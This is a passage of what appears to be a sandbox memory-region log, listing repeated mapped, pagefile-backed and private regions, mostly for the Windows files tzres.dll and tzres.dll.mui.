monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5152
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5153
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5154
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5155
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5156
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5157
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5158
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5159
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5160
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5161
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5162
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5163
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5164
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5165
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5166
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5167
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5168
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5169
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5170
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5171
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5172
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5173
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5174
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5175
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5176
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5177
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5178
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5179
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5180
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5181
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5182
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5183
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5184
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5185
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5186
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5187
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5188
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5189
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5190
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5191
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5192
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5193
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5194
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5195
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5196
start_va = 0x190000
end_va = 0x192fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000190000"
filename = ""
Region:
id = 5197
start_va = 0x1a0000
end_va = 0x1a7fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001a0000"
filename = ""
Region:
id = 5198
start_va = 0x1250000
end_va = 0x12cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001250000"
filename = ""
Region:
id = 5199
start_va = 0x7fffffac000
end_va = 0x7fffffadfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffac000"
filename = ""
Region:
id = 5362
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5363
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5364
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5365
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5366
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5367
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5368
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5369
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5370
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5371
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5372
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5373
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5374
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5375
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5376
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5377
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5378
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5379
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5380
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5381
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5382
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5383
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5384
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5385
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5386
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5387
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5388
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5389
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5390
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5391
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5392
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5393
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5394
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5395
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5396
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5397
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5398
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5399
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5400
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5401
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5402
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5403
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5404
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5405
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5406
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5407
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5408
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5409
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5410
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5411
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5412
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5413
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5414
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5415
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5416
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5417
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5418
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5419
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5420
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5421
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5422
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5423
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5424
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5425
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5426
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5427
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5428
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5429
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5430
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5431
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
